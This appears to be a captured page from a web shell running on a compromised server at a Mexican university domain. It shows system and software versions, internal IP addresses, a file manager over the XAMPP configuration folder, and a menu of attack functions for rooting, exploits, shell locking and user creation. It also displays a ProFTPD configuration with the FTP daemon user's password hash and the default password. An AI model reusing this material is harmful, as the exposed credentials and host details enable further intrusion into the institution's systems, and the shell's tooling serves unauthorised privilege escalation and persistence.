Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
etc /
[ HOME SHELL ]
Name
Size
Permission
Action
extra
[ DIR ]
drwxr-xr-x
openldap
[ DIR ]
drwxr-xr-x
original
[ DIR ]
drwxr-xr-x
ssl
[ DIR ]
drwxr-xr-x
ssl.crt
[ DIR ]
drwxr-xr-x
ssl.key
[ DIR ]
drwxr-xr-x
xampp
[ DIR ]
drwxr-xr-x
freetds.conf
1.07
KB
-rw-r--r--
httpd.conf
18.44
KB
-rw-r--r--
httpd.conf.bak
18.27
KB
-rw-r--r--
locales.conf
370
B
-rw-r--r--
magic
12.66
KB
-rw-r--r--
mime.types
12.11
KB
-rw-r--r--
my.cnf
4.93
KB
-rw-r--r--
openssl.cnf
10.65
KB
-rw-r--r--
pear.conf
1.16
KB
-rw-r--r--
php.ini
62.66
KB
-rw-r--r--
php.ini~
63.99
KB
-rw-r--r--
php.ini-pre1.7.2
30.27
KB
-rw-r--r--
pool.conf
219
B
-rw-r--r--
proftpd.conf
1.69
KB
-rw-r--r--
webalizer.conf
23.36
KB
-rw-r--r--
webalizer.conf.sample
31.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : proftpd.conf
# This is a basic ProFTPD configuration file (rename it to # 'proftpd.conf' for actual use. It establishes a single server # and a single anonymous login. It assumes that you have a user/group # "daemon" and "ftp" for normal operation and anon. ServerName "ProFTPD" ServerType standalone DefaultServer on # Port 21 is the standard FTP port. Port 21 # Umask 022 is a good standard umask to prevent new dirs and files # from being group and world writable. Umask 022 # To prevent DoS attacks, set the maximum number of child processes # to 30. If you need to allow more than 30 concurrent connections # at once, simply increase this value. Note that this ONLY works # in standalone mode, in inetd mode you should use an inetd server # that allows you to limit maximum number of processes per service # (such as xinetd) MaxInstances 30 # Set the user and group that the server normally runs at. User daemon #Group daemon # Normally, we want files to be overwriteable. <Directory /opt/lampp/htdocs/*> AllowOverwrite on </Directory> # only for the web servers content DefaultRoot /opt/lampp/htdocs <Limit SITE_CHMOD> DenyAll </Limit> # daemon gets the password "xampp" UserPassword daemon 2TgxE8g184G9c # daemon is no normal user so we have to allow users with no real shell RequireValidShell off # daemon may be in /etc/ftpusers so we also have to ignore this file UseFtpUsers off
Close